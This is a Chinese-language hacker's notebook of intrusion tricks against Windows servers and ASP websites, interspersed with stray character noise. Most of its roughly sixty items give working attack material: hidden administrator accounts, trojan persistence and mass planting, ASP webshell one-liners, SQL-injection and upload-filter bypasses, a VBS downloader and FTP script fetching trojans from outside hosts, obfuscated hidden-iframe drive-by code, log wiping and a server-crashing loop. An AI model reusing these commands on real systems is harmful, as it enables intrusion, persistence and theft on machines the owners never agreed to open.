入侵渗透笔记

admin

Xp系统修改权限防止病毒或木马等破坏系统，cmd下，
cacls C:\windows\system32 /G hqw20:R
& f0 g2 l/ O' L2 c思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入
( l7 N+ C1 @/ T0 o8 O: c恢复方法：C:\>cacls C:\windows\system32 /G hqw20:F

& f# C5 }+ o! o( i- C7 S2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。
3 X; ?- B8 c3 H7 K5 m
1 |3 x4 ]) ^; ?: w: N, z5 E" `3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。

4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
' y4 D- P2 [, J( X# x
: i; z: w, X+ N5、利用INF文件来修改注册表
[Version]
Signature="$CHICAGO$"
[Defaultinstall]
addREG=Ating
1 S) n& J2 I) }+ Z9 e[Ating]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
3 @; U) `9 s" z其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU
- W; y. c4 y* T2 ~. v$ f; N" ?, AHKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU
HKEY_CURRENT_CONFIG 简写为 HKCC
0x00000000 代表的是 字符串值，0x00010001 代表的是 DWORD值
"1"这里代表是写入或删除注册表键值中的具体数据

% Z5 W: t; Q# J6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,
/ K- a& A7 `0 u多了一步就是在防火墙里添加个端口，然后导出其键值
" d3 v6 N1 Z- O& u. ^) Y0 h[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]

7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。

+ K1 W2 p: w% d. F6 m0 ?+ C8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。
' a0 C" x7 r6 a, v
9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,
1 k* v1 N& M& A+ D可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ M% Z7 s+ P: s4 h7 _
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”

4 d9 s2 @, i. N11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，
用法：xsniff –pass –hide –log pass.txt
% G0 y9 H/ M6 c  i6 f2 H% d, m
# ^7 ~+ @) `4 P! v12、google搜索的艺术
  O1 ?* f& S& m2 Z9 `  o& ?- j! h搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
( r3 r& o# U" G$ N或“字符串的语法错误”可以找到很多sql注入漏洞。

, [) Q5 I$ y# E5 f' g. f' _1 `) u13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
+ L  p7 F9 e# M* r. J
0 L$ v" e' m4 F& f14、cmd中输入 nc –vv –l –p 1987
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃

2 g2 y( {+ [( b1 U" V15、制作T++木马，先写个ating.hta文件,内容为
<script language="VBScript">
2 Q" v* S% D" W+ kset wshshell=createobject ("wscript.shell" )
( }: H9 j1 f) r0 Aa=wshshell.run("你马的名称",1)
: c" f# q# a2 t4 d7 O. ]0 cwindow.close
, ?: c8 R  }! R% }1 {$ @$ v5 D7 K</script>
% v  Q. d7 P: n- z8 h再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
. p( J( W: W+ ]1 {
16、搜索栏里输入
关键字%'and 1=1 and '%'='
关键字%'and 1=2 and '%'='
比较不同处 可以作为注入的特征字符
0 o( ?& X1 w1 N# X
17、挂马代码<html>
$ ~) M% {2 I- \0 E7 Y<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
# R. a2 a& o2 @6 @2 y5 v7 F</html>
8 u: f- H, Q' M' @
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
net localgroup administrators还是可以看出Guest是管理员来。

! {/ i0 D0 e+ L! c19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
用法: 安装： instsrv.exe 服务名称 路径
; E, r' y" ]8 r' V* A卸载： instsrv.exe 服务名称 REMOVE
+ d6 _! c7 q0 z! q* H! C" N' N

2 x) }) E; |# P2 z0 T( j) S* |5 S21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库。
, A6 x$ ^  B3 @* q+ ]% L* z
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~

, p: {% v# O0 D* s0 Y" M23、缺少xp_cmdshell时
: A5 Z  `% l- l! k" i尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
  s; v% V9 Z& p' @. w. |假如恢复不成功,可以尝试直接加用户(针对开3389的)
declare @o int
exec sp_oacreate 'wscript.shell',@o out
5 @$ {  @$ i9 r  Y$ a  I, i) ^exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员

0 j/ T9 i5 D9 f: r9 g  b3 A24.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
; ]7 j0 `" k5 ^* g: C8 qfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
/ Y; c* Q9 X7 D" b+ V9 d5 g, T0 A3 B2 u' A扫描地址.txt里每个主机名一行 用\\开头

( x( n  @6 ?% H6 T) i, k! `) Z5 B% P8 f25、在程序上传shell过程中，程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下： <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
0 |$ M8 T( e5 Q% `7 H
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
+ h0 T5 w3 Q( h, U5 A/ n, E将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
1 ^0 j/ Y/ r% L: m5 L* d9 x$ H& e.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
/ p6 P: @1 z) X. j+ @4 Y  ]
# x2 [" w  E/ y8 r27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
) E; d1 m: V' g/ X$ F2 @3 P& _* f! H- ?然后用#clear logg和#clear line vty *删除日志

) N/ x% U4 ^( c5 Y9 X' y5 p: w28、电脑坏了省去重新安装系统的方法
纯dos下执行，
2 S* k/ i4 N' {% e  p2 n; b) Wxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
7 J0 ]' w7 G8 P8 ~$ `% ]2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config

: d4 L6 O* `2 p- O& _29、解决TCP/IP筛选 在注册表里有三处，分别是：
1 O1 ~( X0 f4 EHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
1 B. t4 Y! A8 P) yHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
" u3 G$ H# m! I0 V0 ?- ?, K分别用
4 D" [, c) N) j3 Oregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ m+ a) V3 Q( l- o9 k" O7 Y命令来导出注册表项
# z3 {% _6 w! K/ a2 J8 i8 ?5 |& ]然后把三个文件里的EnableSecurityFilters"=dword:00000001，
( G1 R8 x  ^/ l' t0 e- O改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
% }6 A( D6 p# L6 Qregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
9 P0 {( r9 C* b$ ~/ A0 [
7 P( z( t5 _" G+ q. t30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
- |- f( I" y( j9 [SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3

/ h0 {/ d5 [# j8 c; K( V31、全手工打造开3389工具
打开记事本，编辑内容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
& B" e4 r  P$ s/ E编辑好后存为BAT文件，上传至肉鸡，执行
- S& y6 L8 b" Q8 C% F8 |
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马

33、让服务器重启
3 y7 e  W' f* M" ~( ~# [7 P5 D写个bat死循环:
0 b# Y7 B5 E  i( O+ A/ k@echo off
:loop1
cls
start cmd.exe
$ y! |# [6 D: @- f3 G  Xgoto loop1
* h# C% E% Q% s; K# Z/ i保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，
@echo off
date /t >c:/3389.txt
time /t >>c:/3389.txt
7 \/ W& m, `& U0 xattrib +s +h c:/3389.bat
attrib +s +h c:/3389.txt
- |5 @( x7 L# S6 S. Q/ v  K9 knetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
8 f; I" b+ Q6 n! I并保存为3389.bat
& I( R% {' \4 _6 r打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号

9 J9 E' [  E2 U35、有时候提不了权限的话，试试这个命令，在命令行里输入：
start http://www.hack520.org/muma.htm然后点执行。（muma.htm是你上传好的漏洞网页）
6 c- }: d: e) P1 V4 J# t输入：netstat -an | find "28876" 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。
7 f; z0 l9 E( J) v, y
/ e' P- U# ?0 i3 u; x9 t36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
) s$ a- t: W7 d$ u! C6 w9 U) x1 j% Necho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
echo 你的FTP账号 >>c:\1.bat //输入账号
echo 你的FTP密码 >>c:\1.bat //输入密码
echo bin >>c:\1.bat //登入
) l, C' X$ ~8 L! |; becho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
echo bye >>c:\1.bat //退出
4 f2 ]; V! t2 K  b9 a- P1 v; V然后执行ftp -s:c:\1.bat即可
, o& y0 `0 z3 {: Z
, U6 y) N. t0 O+ d6 {37、修改注册表开3389两法
（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
echo Windows Registry Editor Version 5.00 >>3389.reg
2 u/ n+ O$ s* _$ U& [6 {9 t1 @* Eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
: [* X1 ~5 L% q1 Recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>3389.reg
" Y3 U! g% b  k6 fecho "ShutdownWithoutLogon"="0" >>3389.reg
+ R# N3 H1 {0 R5 B0 Iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
: P! C1 e- c, I; x/ _/ P>>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
# J+ C: ^8 t; _; Z, [>>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
9 M+ ^( d5 F( N% r5 G3 ^  q9 R>>3389.reg
4 }( ?5 s& ?. R- J1 ~: Secho "Start"=dword:00000002 >>3389.reg
# R/ _/ ^! o+ A: S& u% L9 V+ `  wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
! ?# `8 |- y2 }& R- O* m" p+ V$ uecho "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
. m& y8 W* x% ~- M8 A1 Qecho "PortNumber"=dword:00000D3D >>3389.reg
2 @# S) ^$ U$ I0 G1 m+ C8 x7 ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 @% X' X% _3 fServer\WinStations\RDP-Tcp] >>3389.reg
$ J" _/ J! b  Zecho "PortNumber"=dword:00000D3D >>3389.reg
- i* r. o; y! E6 M把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。
" q# g1 E1 Q8 M4 n(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
" ^$ R; B  C, Y- c6 z/ I: W因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
（2）winxp和win2003终端开启
用以下ECHO代码写一个REG文件：
! o) k# C5 a( y% J2 _1 M6 r8 Lecho Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% G) D2 H- ]: @8 \( l; OServer\WinStations\RDP-Tcp]>>3389.reg
" I: L0 z. O' m  h2 Secho "PortNumber"=dword:00000d3d>>3389.reg
* P0 B, ]: M( L1 q然后regedit /s 3389.reg del 3389.reg
XP下不论开终端还是改终端端口都不需重启

38、找到SA密码为空的肉鸡一定要第一时间改SA密码，防止别人和我们抢肉吃
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'

39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！
（1）数据库文件名应复杂并要有特殊字符
4 d2 u% m( D3 ~) Z  I8 Y（2）不要把数据库名称写在conn.asp里，要用ODBC数据源
将conn.asp文档中的
DBPath = Server.MapPath("数据库.mdb")
! M6 L' R# F% U  P5 r' ~1 c% Rconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" ＆ DBPath
$ \. \# _- I2 i, R
% X, B# n: M, G3 m6 j修改为：conn.open "ODBC数据源名称," 然后指定数据库文件的位置
（3）不放在WEB目录里

8 G/ U# R" z( J* R1 m40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
; h3 p* p9 }2 K$ i@echo off
" X4 I7 X; |  K8 b, z9 o@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
@del c:\winnt\system32\query.exe
@del %SYSTEMROOT%\system32\dllcache\query.exe
- a/ h' E- y9 |6 ?8 w@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
- l1 k  Z. E2 _/ ?# d
@echo off
  d$ ]2 `3 [( ^$ d! v@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
' n# E- b$ b8 t+ `4 u@del c:\winnt\system32\tsadmin.exe
0 L3 Q9 T6 U% [! ]/ s@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex

41、映射对方盘符
' m0 S! x  C8 e) p% F" a1 qtelnet到他的机器上，
net share 查看有没有默认共享 如果没有，那么就接着运行
net share c$=c:
8 h8 g5 C/ J7 a. C- |  O' Qnet share现在有c$
$ h$ e4 U2 y$ g+ X6 {7 ]2 v% b在自己的机器上运行
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K
4 w& v) L  G2 s6 C1 _+ X
( b3 k( A6 g) ~8 Z" f8 C1 ^9 E' `42、一些很有用的老知识
type c:\boot.ini ( 查看系统版本 )
5 J- N6 w% V3 X( Nnet start (查看已经启动的服务)
- i6 T6 @9 }; Z: \4 Zquery user ( 查看当前终端连接 )
net user ( 查看当前用户 )
. i! g$ _& P% H3 v0 Y4 K# g; m* Enet user 用户 密码/add ( 建立账号 )
, G2 s! w; x. I7 Fnet localgroup administrators 用户 /add (提升某用户为管理员)
0 t  R0 C. Q" G6 l) K0 Cipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
+ _. n4 K# t* X: }* h8 F' A6 }findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
/ P: ?5 E* x% D) \, E" w克隆时Administrator对应1F4
* T9 J2 y2 h/ \  vguest对应1F5
tsinternetuser对应3E8
5 k1 U! E4 x& c$ f# l8 l, m
3 X4 I2 n/ ^- {43、如果对方没开3389，但是装了Remote Administrator Service
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"

44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）
9 h& F+ I# i! t; d. N9 e! o4 n" I5 y本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）

45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
5 F5 \. [! I! K" kCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
5 f' h9 ~- Y2 s0 G% k（这是完整的一句话，其中没有换行符）
: P, A% n) t! l% Y3 f! S$ g然后下载:
cscript down.vbs http://www.hack520.org/hack.exe hack.exe

46、一句话木马成功依赖于两个条件：
! d5 e- V$ A- u0 l0 Y5 W１、服务端没有禁止adodb.Stream或FSO组件
3 T: y7 z8 A9 t/ P$ {２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。

47、利用DB_OWNER权限进行手工备份一句话木马的代码：
;alter database utsz set RECOVERY FULL--
;create table cmd (a image)--
7 l  Q# h8 N9 V$ Z% k" O;backup log utsz to disk = 'D:\cmd' with init--
: a1 d1 c9 g; }! g& w- H;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
  b5 R$ k4 _/ d0 S' z% s3 r3 N;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
' w/ i6 b7 N. c$ Q注：0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
1 _, D! U& J0 L3 M
48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
: [& b! {+ N% Y: ~# `! G) F1 e  w所有会话用 'all'。
-s sessionid 列出会话的信息。
-k sessionid 终止会话。
6 [/ ^& K4 C) [& x$ [-m sessionid 发送消息到会话。

config 配置 telnet 服务器参数。

, A; N  x' L4 k1 r+ _common_options 为:
: M9 f* [+ r9 U. J/ _' m# `-u user 指定要使用其凭据的用户
-p password 用户密码

config_options 为:
dom = domain 设定用户的默认域
ctrlakeymap = yes|no 设定 ALT 键的映射
timeout = hh:mm:ss 设定空闲会话超时值
8 c; Y8 j+ S9 R# gtimeoutactive = yes|no 启用空闲会话。
maxfail = attempts 设定断开前失败的登录企图数。
maxconn = connections 设定最大连接数。
, b! ]8 p& U* z7 Gport = number 设定 telnet 端口。
( C: s, B+ _) I1 V* C: @sec = [+/-]NTLM [+/-]passwd
设定身份验证机构
5 n9 l3 k5 \* N) Efname = file 指定审计文件名。
fsize = size 指定审计文件的最大尺寸(MB)。
mode = console|stream 指定操作模式。
/ N( Y5 Q: S7 U% ^( a. N( Tauditlocation = eventlog|file|both
指定记录地点
* ^2 |5 @* {8 @9 p$ oaudit = [+/-]user [+/-]fail [+/-]admin
  N6 z9 C" L7 a3 {3 w
, c7 D1 R1 f/ a7 h, ~/ B49、例如:在IE上访问:
. `3 G6 y4 P( H+ g# L$ |# ]6 k$ z- Nwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
( ~" V( m$ v. ~( Q0 Bhack.txt里面的代码是：
8 [; j) D! j( X6 `8 }1 ]2 I# a5 N<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
) T3 l: G, P1 u) ^! k# L" b; u把这个hack.txt发到你空间就可以了！
这个可以利用来做网马哦！

50、autorun的病毒可以通过手动限制！
1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！
2，打开盘符用右键打开！切忌双击盘符～
) u: i& \1 {7 c# D3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！

51、log备份时的一句话木马：
a).<%%25Execute(request("go"))%%25>
* W) o( ]. ^. ]. n* Nb).<%Execute(request("go"))%>
) L: o% `3 l! A2 oc).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
3 B" Q5 q, \' ~! _! ?8 O# ae).<%25Execute(request("l"))%25>
f).<%if request("cmd")<>"" then execute request("pass")%>

52、at "12:17" /interactive cmd
+ n$ A2 ?( B8 P' ?9 N8 \执行后可以用AT命令查看新加的任务
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。

53、隐藏ASP后门的两种方法
1 {) X6 p, @' ?7 ^/ B% x' R0 [/ N8 f1、建立非标准目录：mkdir images..\
- M: n0 s! `2 D6 D7 W% R拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
- D3 u9 k; n* `0 G通过web访问ASP木马：http://ip/images../news.asp?action=login
( \8 {  U4 Q/ @% h7 }如何删除非标准目录：rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容：<!--#include file=”12.jpg”-->
% V9 [3 D6 r& L, ?9 f: {4 P% z# j  i新建12.jpg文件内容：<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
" g8 j! s% B, Q  a8 G! D; \, x2 R通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt
( B  d8 |$ ]- M4 S" I
54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。
$ A( z& T0 N* n/ ~然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。
& ^3 b. T. m) f# ~
3 _+ _' [( z, K$ a55、JS隐蔽挂马
% ^0 ]$ N( x+ t! ~% ?2 ]; L1.
var tr4c3="<iframe src=ht";
; G% a5 l/ u/ ~+ U- j/ dtr4c3 = tr4c3+"tp:/";
tr4c3 = tr4c3+"/ww";
tr4c3 = tr4c3+"w.tr4";
8 g7 t4 l7 ^3 Q( H) ^% G. K+ d4 S$ ytr4c3 = tr4c3+"c3.com/inc/m";
tr4c3 = tr4c3+"m.htm style="display:none"></i";
. S/ I( k: g& P+ V# k" Y5 |tr4c3 =tr4c3+"frame>'";
document.write(tr4c3);
7 z+ ^  U: Q4 l* ?( {) h避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。
5 \, C+ i5 y8 }/ A+ B
2.
" U; t+ F+ D+ u3 S0 `6 \$ _5 R转换进制，然后用EVAL执行。如
% b9 B  v+ H% _6 y3 @# x1 xeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
: m  W# ]8 F( D4 p- L0 P  x不过这个有点显眼。
9 F6 ~& t( \8 ~: H+ D! N% Q( m0 Y4 k3.
% n- ?+ J: `2 u# G, v: [document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
. b0 P* U9 o, W- x最后一点，别忘了把文件的时间也修改下。
4 t  a9 y- v. f  k) y, m
6 O0 c& i9 c5 s: [0 p7 e56.3389终端入侵常用DOS命令
taskkill taskkill /PID 1248 /t

; o" b" T  z9 d" f% x9 j5 a( qtasklist 查进程

cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
iisreset /reboot
5 P: E  O5 b4 T8 b( W6 ztsshutdn /reboot /delay:1    重起服务器

logoff 12 要使用会话 ID（例如，会话 12）从会话中注销用户，

query user 查看当前终端用户在线情况
" D3 I* ]) M# ]
要显示有关所有会话使用的进程的信息，请键入：query process *
" J6 j0 L$ j+ a$ P# q
要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2
8 a* Q) f5 p6 r0 W4 e
要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2
, P$ A3 z! D9 O; T
  {7 l3 D: R/ D) y3 n+ u  \要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02
* r2 L1 `4 l6 k1 {8 K; T9 C
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
2 x) W& A$ F6 E/ \
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
- q  K: h% r  u
* a5 F% v; v9 x% L4 C命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。

' E8 A& h0 o, g* T  s$ E  C, ^" R命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
/ ^/ l6 x2 \, B- l/ v
; H* V! x) {7 A/ s1 Q56、在地址栏或按Ctrl+O，输入：
8 D- l, S& ~! H! S0 f4 Ujavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;

源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。
  M; ?/ R7 O. i% }2 m' v
8 r6 v: ~5 O: p# c57、net user的时候，是不能显示加$的用户，但是如果不处理的话，
# Y7 S% L1 j2 v3 k: o用net localgroup administrators是可以看到管理组下，加了$的用户的。

7 i) }4 A2 S$ V# K58、 sa弱口令相关命令
# H" W, M- D% g0 z7 W
一.更改sa口令方法：
用sql综合利用工具连接后，执行命令：
( x+ p/ G  S3 d$ l0 zexec sp_password NULL,'20001001','sa'
0 C3 R: d0 ]2 k1 G0 d3 X& s(提示：慎用!)
/ s: D0 r0 c2 D: ^6 d0 ]  M! Y6 l
- {, G. g+ p! p9 ~- R1 D0 y二.简单修补sa弱口令.

8 e% P) j0 j: h; h; E/ M! l, Y; A方法1:查询分离器连接后执行：
9 {4 }2 ~/ L3 X& z( Bif exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
/ T6 E$ D+ w# C% BOBJECTPROPERTY(id, N'IsExtendedProc') = 1)

' q1 \) f' m* M% T, ^% Oexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
. g8 B' E- [6 H0 C9 u
9 k$ e: l. l7 o7 F' @GO
! W# {& @9 A% @  U# k0 Q
然后按F5键命令执行完毕
: |- u) @( }' [6 l- Q, `/ g+ {
: S( z+ V3 k5 M4 ]5 H) ]/ P0 n" V方法2:查询分离器连接后
第一步执行：use master
% z$ c7 ?/ Z8 t7 s1 m( \* y, x第二步执行：sp_dropextendedproc 'xp_cmdshell'
+ N) W! ^+ U& ^7 `9 U7 X* \9 V然后按F5键命令执行完毕
) _4 B+ j1 P) D$ C, z  P
+ C9 y: J  C5 d! s7 l* y7 m/ ?7 e
- s; r8 i& ~9 o' q6 V7 b3 G) l! E三.常见情况恢复执行xp_cmdshell.
  u: U$ t. b* S6 b5 w; ~
